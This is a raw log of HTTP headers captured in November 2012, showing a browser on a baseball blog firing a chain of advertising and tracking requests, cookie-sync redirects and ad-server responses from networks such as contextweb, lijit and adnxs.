User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: bkc=KJpqyXU9LYrRiKcJooDOM9y1ecr94JjeeYMX5iPD4QynQLXJ8mIjpLeyY/k4mCVP7TesO2Wy439T96wG/uRy7y7vdfQBk4XKMxI0cXRc9BR2ng1=; bklc=50a9b2e6; bko=; bkp1=; bku=DHz99mv03PelwF+4; bkw5=; bkdc=snv; bkst=KJhMR5Mehze9pkYSk8tUU8fljBwv999+7xjh
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bkc=KJpqpXU9zesRiKc8ooDOM9y1ewrO418eeYMXDf3GdOQVOcXwAnXn3wXJWoXa3OIjlbbW0Q4oCdW8Q4y26hARcichubKiXCwxIY9ShQXDjt9/wzxW8MBOIHIlG4n4GdaO2LwT9vJXwtL=; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bklc=50a9b2e7; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bkst=KJhMR5Mehze9pkYSk8tUU8fljBwv9OSsdD9CWxR7UN6eYe9t1MDpBMRhBqOXeoxc9aA9e4Q=; expires=Sat, 18-May-2013 04:17:43 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Wed, 19-Dec-2012 04:17:43 GMT; path=/; domain=.bluekai.com
BK-Server: 14b0
Content-Length: 62
GET /TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66900&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=728X90&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=79046235&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?tagver=1&amp;cp=520266&amp;ct=66900&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=728X90&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=79046235&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=2; wf=0; pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: application/x-javascript;charset=utf-8
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
CW-Server: LGA-APP215 LGA-APP401 LGA-APP307
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:43 GMT
Content-Length: 1134
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: 66900_728X90__POSUNKNOWNXUNKNOWN=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ vf=3; Domain=.contextweb.com; Expires=Mon, 19-Nov-2012 05:00:00 GMT; Path=/
GET /5/track_targeting/276422772/x95/USNetwork/track_targeting/reporting/77352b4d335643707375634141746d30?XE&MAX-Site=bloguin&MAX-Campaign=USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign&XE HTTP/1.1

Host: network.realmedia.com
GET /5/track_targeting/276422772/x95/USNetwork/track_targeting/reporting/77352b4d335643707375634141746d30?XE&amp;MAX-Site=bloguin&amp;MAX-Campaign=USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign&amp;XE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: OAX=w5+M3VCpsucAAtm0; RMFD=011TaInnO101GLK; NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Pragma: no-cache
Cache-Control: no-cache
Location: http://imagen01.247realmedia.com/0/default/empty.gif
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Mon, 19-Nov-2012 04:18:43 GMT;path=/;httponly
GET /0/default/empty.gif HTTP/1.1

Host: imagen01.247realmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache/2.2.3 (Red Hat)
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Last-Modified: Fri, 23 Jan 2009 07:11:07 GMT
Etag: &quot;1368001-2b-4612117be38c0&quot;
Accept-Ranges: bytes
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:43 GMT
Connection: keep-alive
GET /do-association?ctxweb&can=10 HTTP/1.1

Host: matcher-cwb.bidder7.mookie1.com
GET /do-association?ctxweb&amp;can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: id=4612319699895321067; path=/; domain=.mookie1.com; expires=Sat, 14-Dec-2013 04:17:43 GMT mdata=1|4612319699895321067|1353298663; path=/; domain=.mookie1.com; expires=Sat, 14-Dec-2013 04:17:43 GMT
Location: /do-association-set?ctxweb&amp;can=10
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Content-Length: 0
Keep-Alive: timeout=1, max=504
Connection: Keep-Alive
GET /beacon?viewId=1353298662674c203f9f9ae4d&rand=1353298662674&uri=http://www.lijit.com/users/bloguin/1&informer=6280786&type=fpads&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&ifr=1&v=1.0&rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: gslbeacon.lijit.com
GET /beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa
HTTP/1.0 200 OK

Content-Type: text/html
Server: Lijit Blackbird 0.0.2
Connection: close
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 776
Set-Cookie: tpro=eJxNkNGOhCAMRf%2Blz2SCIo7jb8y%2BbTaEYFUSAQO6ycb471swM5m303LvbekByW6YoP8%2BCkEPzzXELQEDvUFfCSnqR9e24vxhELYZI%2FQHuDAoE3afFQzcZh1%2Bahn8Ykw2eIqDk0HEEWO0fnqijmb%2BwujySEpcYxjtgjnTehNcoYpztS47SfitvjNouaJWqToGgquWv564EoWrjsboqdiFVM0jN2kP%2BZEkyauqOjMnrqi4Fy9xp0RTLBRjwrLgFTVFPahk5iKTH0%2F81jDwwV8os2u2yxDRZ9sflolNnTWZZF5vQj9c5xvR6aVYKfON%2BVDalLlG7yb3uvfNaWfac7ZpLdzSb5PV%2FvUZPUalXam68zz%2FAQOfhTs%3D%00%00;Expires=Tue, 19-Nov-13 04:17:43 GMT;Domain=localhost tpro_inst=e8956a529a2b2e1276b264232e07a222;Expires=Tue, 19-Nov-13 04:17:43 GMT;Domain=localhost
GET /PropertyAssets/ArticleImages/70ea265eb14964beddaf244fdacc9702_72e1255182e32fecbb0f2af51f268f4f.PNG HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=wjzyzr31rdtsq4rrlm3pacbw; urlHistory=388817:1,387812:1,12084:1,106115:1
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Wed, 14 Nov 2012 13:01:34 GMT
Accept-Ranges: bytes
Etag: &quot;ac7caf2c68c2cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:19 GMT
Content-Length: 33406
GET /cw_match HTTP/1.1

Host: um.simpli.fi

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uid=7pq52t7ykTScBPbInO0TlJ%3D%3D
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: nginx
Date: Mon, 19 Nov 2012 04:17:43 GMT
Transfer-Encoding: chunked
Connection: close
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=537085&amp;ev=DAB99AEE3491F2DEC8F6049C9413ED9C
P3P: policyref=&quot;http://www.simplifi.com/w3c/Policies.xml&quot;, CP=&quot;ADMa DEVa PSAa PSDa OUR IND DSP NON COR&quot;
GET /www/delivery/lg.php?bannerid=1549&campaignid=232&cids=232&bids=1549&zoneid=95029&tid=95029_1353298662292da37f36c0459&channel_ids=,&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&cb=198e1eed62 HTTP/1.1

Host: vap3iad3.lijit.com
GET /www/delivery/lg.php?bannerid=1549&amp;campaignid=232&amp;cids=232&amp;bids=1549&amp;zoneid=95029&amp;tid=95029_1353298662292da37f36c0459&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=198e1eed62 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; expires=Tue, 19-Nov-2013 04:17:43 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
GET /cm?in=1&pub=1827 HTTP/1.1

Host: p.rfihub.com
GET /cm?in=1&amp;pub=1827 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: s6=1353298662415; u=&quot;aABQoWxQQ==AI3Yyfww==AAABOxbi1A8=&quot;; e=cr; a=c638103774108863402; j=c638103774108863402; r=1353298662415; o=1-8wjRgbiRTjyi; p=1-8wjRgbiRTjyi
HTTP/1.1 302 Found

HTTP/1.1 302 Found
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: v=1353298663617;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:43 GMT s6=1353298663617;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:43 GMT u=&quot;aABQoZUPw==AI3Yyfww==AAABOxbi2ME=&quot;;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:43 GMT e=cr;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:43 GMT a=c638103774108863402;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:43 GMT j=c638103774108863402;Path=/;Domain=.rfihub.com
Location: http://ce.lijit.com/merge?pid=10&amp;3pid=638103774108863402&amp;forward=
Content-Length: 0
GET /site=782467/size=300250/u=2/bnum=82574062/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

Host: r1.ace.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQAQ7oEAAAAAAPL-IAAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAAmGQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0nl0zZ5fyDJK-L4dTr-5Wz7Lp7cDnX.5.rk.vAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18elijit_box..html,Z%3D300x250%26_salt%3D115542970%26anmember%3D514%26anprice%3D100%26r%3D0%26s%3D653070,106c775a-3200-11e2-909d-b32498808ef9,1353298663146
Cookie: ACID=jN800013532986620009; ASCID=jN800013532986620009; F1=BYuspClAAAAAHC/CAEAAgEABAAAABAAAAEAAgEA
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;, an.n=&quot;Advertising.com&quot;, an.pp=&quot;http://advertising.aol.com/privacy/advertisingcom&quot;, an.oo=&quot;http://advertising.aol.com/privacy/advertisingcom/opt-out&quot;, an.by=&quot;Y&quot;
Comscore: CMXID=2115.1008818.782467.0XMC
Set-Cookie: F1=BcuspClAAAAADC/CAEAAgEgAAAAAHC/CAEAAgEABAAAABAAAAIAAgEA; domain=advertising.com; expires=Wed, 19-Nov-2014 04:17:43 GMT; path=/ 82574062=_50a9b2e7,4600216405,782467^1008818^-20^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 19 Nov 2012 04:17:43 GMT
ntCoent-Length: 501
Content-Encoding: gzip
Content-Length: 325
GET /00/72/26/uat_2672.js?ad_size=300x250,300x600 HTTP/1.1

Host: ad-cdn.technoratimedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/site=782467/size=300250/u=2/bnum=82574062/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: tads_uid=839656B2FC05473098555B1265D9DDB9; tads_uid_cd=20121118201742-0800; tads_zora=1|15663|1; tads_au=&quot;1|CAE=&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Encoding: gzip
_ontent-Length: 9706
Accept-Ranges: bytes
Date: Mon, 19 Nov 2012 04:17:43 GMT
Etag: &quot;142a1d-25ea-4cbe3a3f0e932&quot;
Last-Modified: Fri, 12 Oct 2012 21:47:55 GMT
Server: ECS (arn/46E5)
Vary: Accept-Encoding
X-Cache: HIT
X-Via: CN-5000
Content-Length: 3727
GET /getuid?http://ce.lijit.com/merge?pid=12&3pid=$UID HTTP/1.1

Host: ib.adnxs.com
GET /getuid?http://ce.lijit.com/merge?pid=12&amp;3pid=$UID HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQQQAn*$l!B)c&gt;.#QydEnS'Jn!wd6!:(Q!%64(.; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgDIAMoAzDm5aaFBQoSCNPMCBAKGAEgASgBMOflpoUFEOflpoUFGAQ.; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb736745=![nC'208WMHC=j@E/qX3/1#:J?enc=MzMzMzMz8z9SuB6F61HwPwAAAEAzM_M_UrgehetR8D8zMzMzMzPzPxpzuWDUr9dgoArzhH1cTlHmsqlQAAAAAKyWCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAIE8BAgUCAQUAAAAA5iDVpQAAAAA.&amp;tt_code=653070&amp;cnd=%21SyLVZAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEzMzMzMzPzP8EBMzMzMzMz8z_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298662%29%3Buf%28%27r%27%2C+3581447%2C+1353298662%29%3Bppv%2827656%2C+%276978239474324566810%27%2C+1353298662%2C+1353557862%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:43 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:43 GMT; domain=.adnxs.com; HttpOnly
Location: http://ce.lijit.com/merge?pid=12&amp;3pid=5858721859426781856
Date: Mon, 19 Nov 2012 04:17:43 GMT
Content-Length: 0
GET /lj_match?r=1353298663538 HTTP/1.1

Host: um.simpli.fi

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uid=7pq52t7ykTScBPbInO0TlJ%3D%3D
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: nginx
